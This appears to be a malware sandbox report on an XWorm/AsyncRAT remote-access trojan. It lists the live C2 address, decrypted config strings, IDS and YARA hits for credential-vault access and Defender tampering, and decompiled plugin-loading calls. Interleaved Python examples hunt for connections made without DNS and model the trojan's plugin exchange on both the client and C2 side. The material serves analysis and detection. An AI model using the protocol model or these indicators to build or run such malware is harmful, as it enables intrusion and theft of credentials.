Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
String decryptor: 91.92.242.85 |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
String decryptor: 3344 |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
String decryptor: <123456789> |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
String decryptor: <Xwormmm> |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
String decryptor: XWorm V5.6 |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
String decryptor: USB.exe |
Source: Traffic |
Snort IDS: 2853192 ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound 192.168.2.5:49705 -> 91.92.242.85:3344 |
Source: Traffic |
Snort IDS: 2853191 ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound 91.92.242.85:3344 -> 192.168.2.5:49705 |
Source: Traffic |
Snort IDS: 2852873 ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M2 192.168.2.5:49706 -> 91.92.242.85:3344 |
Source: Traffic |
Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.5:49706 -> 91.92.242.85:3344 |
Source: Traffic |
Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 91.92.242.85:3344 -> 192.168.2.5:49705 |
Source: Traffic |
Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 91.92.242.85:3344 -> 192.168.2.5:49705 |
Source: Traffic |
Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.5:49705 -> 91.92.242.85:3344 |
Source: Traffic |
Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.5:49705 -> 91.92.242.85:3344 |
Source: Traffic |
Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.5:49705 -> 91.92.242.85:3344 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
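The repeated "TCP traffic detected without corresponding DNS query" finding above is a generic hunting signal: the implant carries its C2 as an IP literal (91.92.242.85 from the decrypted config) so no name is ever resolved before the connection. The following is an added example, not part of the sandbox report or of any vendor tool, showing how to reproduce that check over a connection log. The event format and the sample lines are constructed for the example; only the 91.92.242.85:3344 endpoint and the 192.168.2.5 source come from the report. Caveat for production use: legitimate software also talks to IP literals (CDN pinning, DoH resolvers, hardcoded update servers), so treat a hit as a lead to enrich with ASN, first-seen and process context rather than a verdict on its own.

```python
"""Flag outbound TCP connections whose destination was never returned by DNS.

Added example (not the report's or any product's code). Event lines are a
constructed "ts kind k=v ..." text format, not a real sensor export.
"""
import ipaddress
from collections import defaultdict
from dataclasses import dataclass

# Constructed events. 91.92.242.85:3344 is the C2 endpoint from the decrypted
# XWorm config; 8.8.8.8 and 1.1.1.1 are resolved first and act as controls.
SAMPLE_EVENTS = """\
1.000 dns query=files.example.org answer=8.8.8.8
1.010 tcp src=192.168.2.5:49700 dst=8.8.8.8:443
1.500 tcp src=192.168.2.5:49705 dst=91.92.242.85:3344
2.000 tcp src=192.168.2.5:49706 dst=91.92.242.85:3344
2.200 dns query=cdn.example.net answer=1.1.1.1
2.300 tcp src=192.168.2.5:49707 dst=1.1.1.1:443
"""


@dataclass(frozen=True)
class Hit:
    ts: float
    src: str
    dst_ip: str
    dst_port: int


def _parse_kv(fields):
    return dict(f.split("=", 1) for f in fields)


def find_dnsless_connections(text, ignore_private=True):
    """Return a Hit for every TCP connection to an IP with no earlier DNS answer.

    Only answers seen *before* the connection count, so a resolution that
    arrives later does not retroactively excuse the connection. Private
    destinations are skipped by default because LAN traffic rarely uses DNS.
    """
    resolved = set()          # IPs returned by DNS answers so far
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, kind, *rest = line.split()
        kv = _parse_kv(rest)
        if kind == "dns":
            resolved.add(kv["answer"])
        elif kind == "tcp":
            dst_ip, dst_port = kv["dst"].rsplit(":", 1)
            if ignore_private and ipaddress.ip_address(dst_ip).is_private:
                continue
            if dst_ip not in resolved:
                hits.append(Hit(float(ts), kv["src"], dst_ip, int(dst_port)))
    return hits


def summarize(hits):
    """Collapse hits per destination so a beaconing C2 shows as one line with a count."""
    per_dst = defaultdict(int)
    for h in hits:
        per_dst[(h.dst_ip, h.dst_port)] += 1
    return dict(per_dst)


if __name__ == "__main__":
    for (ip, port), n in summarize(find_dnsless_connections(SAMPLE_EVENTS)).items():
        print(f"{ip}:{port} contacted {n}x without a preceding DNS answer")
```

Run against the constructed events, the only destination reported is 91.92.242.85:3344, contacted twice, which matches the report's repeated finding; the two resolved destinations are silent.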
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: http://james.newtonking.com/projects/json |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp, 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://github.com/LimerBoy/StormKitty |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://support.mozilla.org |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://urn.to/r/sds_see |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://urn.to/r/sds_seeaCould |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6 |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3257323958.00000000128F8000.00000004.00000800.00020000.00000000.sdmp, places.raw.0.dr, tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3257323958.00000000128F8000.00000004.00000800.00020000.00000000.sdmp, places.raw.0.dr, tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3257323958.00000000128F8000.00000004.00000800.00020000.00000000.sdmp, places.raw.0.dr, tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www. |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.newtonsoft.com/jsonschema |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, type: SAMPLE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 0.0.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.3a0000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables containing artifacts associated with disabling Windows Defender Author: ditekSHen |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.unpack, type: UNPACKEDPE |
Matched rule: Detects executables containing artifacts associated with disabling Windows Defender Author: ditekSHen |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.unpack, type: UNPACKEDPE |
Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen |
Source: 00000000.00000002.3255984514.0000000002560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables containing artifacts associated with disabling Windows Defender Author: ditekSHen |
Source: 00000000.00000000.1986182234.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F26B22 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F2A6A8 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F29562 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F25D76 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F2AF3A |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F22A48 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F31267 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F23A6D |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F328FA |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F2D130 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F329D3 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F25879 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F41060 |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3255984514.0000000002560000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameOptions.dll0 vs 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameRecovery.dll2 vs 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000000.1986182234.00000000003A2000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameXClient.exe4 vs 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Binary or memory string: OriginalFilenameXClient.exe4 vs 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, type: SAMPLE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 0.0.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.3a0000.0.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifacts associated with disabling Windows Defender |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifacts associated with disabling Windows Defender |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers |
Source: 00000000.00000002.3255984514.0000000002560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifacts associated with disabling Windows Defender |
Source: 00000000.00000000.1986182234.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.raw.unpack, Helper.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.raw.unpack, Helper.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.raw.unpack, Botkiller.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.raw.unpack, Botkiller.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: mscoree.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: apphelp.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: version.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: vcruntime140_clr0400.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: ucrtbase_clr0400.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: ucrtbase_clr0400.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: uxtheme.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: cryptsp.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: rsaenh.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: cryptbase.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: sspicli.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: windows.storage.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: wldp.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: profapi.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: mswsock.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: wbemcomn.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: amsi.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: userenv.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: avicap32.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: msvfw32.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: winmm.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: winmm.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: ntmarta.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: dpapi.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: vaultcli.dll |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: wintypes.dll |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
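The two decompiled calls above, together with the paired sendPlugin (outbound) and savePlugin (inbound) Snort hits, describe how this client fetches and runs plugins: the message is split on Settings.SPL (the `<Xwormmm>` string recovered by the string decryptor), `Pack[2]` is passed to the plugin's `Invoke` as an argument, and `Pack[3]` is base64-decoded and decompressed into the plugin image. The following is an added example, not code from the sample or from the XWorm project, that models that message layer so an analyst can pull the plugin out of a captured savePlugin message. Everything beyond what the report shows is an assumption and is marked as such in the code: the field order `cmd<SPL>hash<SPL>arg<SPL>payload`, gzip as the compressor behind `Helper.Decompress`, SHA-256 as the plugin identifier, and the fact that the AES layer wrapping each frame has already been stripped. The stand-in plugin bytes are constructed; only the SPL value comes from the report.

```python
"""Plugin exchange at the XWorm message layer (added example, not the sample's code).

Models the layer after AES decryption: fields joined by the SPL delimiter, plugin
bytes carried as base64(compressed). Assumptions not stated by the report: field
order cmd<SPL>hash<SPL>arg<SPL>payload, gzip compression, SHA-256 plugin ids.
"""
import base64
import gzip
import hashlib

SPL = "<Xwormmm>"   # delimiter recovered by the string decryptor in the report

# Constructed stand-in for a plugin DLL: MZ prefix, filler, a name like the
# OriginalFilename seen in the dumped module. Not a real PE image.
FAKE_PLUGIN = b"MZ" + b"\x00" * 62 + b"Recovery.dll" + b"\x90" * 200


def pack(*fields):
    """Join fields the way the client later splits them (Pack = msg.Split(SPL))."""
    return SPL.join(str(f) for f in fields)


def unpack(msg):
    return msg.split(SPL)


def encode_plugin(blob):
    """Inverse of the client's Decompress(FromBase64String(...)): gzip, then base64."""
    return base64.b64encode(gzip.compress(blob)).decode("ascii")


def extract_plugin(msg):
    """Return the raw plugin bytes from a savePlugin message.

    Rejects wrong commands, undecodable payloads, non-PE output and hash
    mismatches, so nothing malformed is ever cached or handed to Invoke.
    """
    fields = unpack(msg)
    if len(fields) < 4 or fields[0] != "savePlugin":
        raise ValueError("not a savePlugin message")
    try:
        blob = gzip.decompress(base64.b64decode(fields[3], validate=True))
    except Exception as exc:            # binascii.Error or gzip.BadGzipFile
        raise ValueError(f"payload does not decode: {exc}") from exc
    if not blob.startswith(b"MZ"):
        raise ValueError("decoded plugin is not a PE image")
    if hashlib.sha256(blob).hexdigest() != fields[1]:
        raise ValueError("plugin hash mismatch")
    return blob


class Server:
    """C2 side: answers sendPlugin with the requested blob (assumed field order)."""

    def __init__(self, plugins):
        self.plugins = {hashlib.sha256(b).hexdigest(): b for b in plugins}

    def handle(self, msg):
        fields = unpack(msg)
        if fields[0] == "sendPlugin" and fields[1] in self.plugins:
            blob = self.plugins[fields[1]]
            return pack("savePlugin", fields[1], fields[2], encode_plugin(blob))
        return None


class Client:
    """Implant side: asks for plugins it has not cached and stores what arrives."""

    def __init__(self):
        self.cache = {}

    def request(self, digest, arg=""):
        return pack("sendPlugin", digest, arg)

    def handle(self, msg):
        blob = extract_plugin(msg)
        digest = unpack(msg)[1]
        self.cache[digest] = blob
        return digest


def run_exchange(plugin=FAKE_PLUGIN):
    """One round trip; returns (request, reply, digest) so each leg can be inspected."""
    server, client = Server([plugin]), Client()
    digest = hashlib.sha256(plugin).hexdigest()
    req = client.request(digest, arg="ID=1")
    reply = server.handle(req)
    client.handle(reply)
    return req, reply, digest


if __name__ == "__main__":
    req, reply, digest = run_exchange()
    print("client ->", req[:60])
    print("server ->", reply[:60], "...")
    print("plugin bytes recovered:", len(extract_plugin(reply)))
```

In practice `extract_plugin` is the piece you keep: feed it a decrypted savePlugin message from a capture and write the returned bytes to disk for static analysis. The MZ and hash checks are what separates a usable plugin carve from a truncated or corrupted frame.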
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
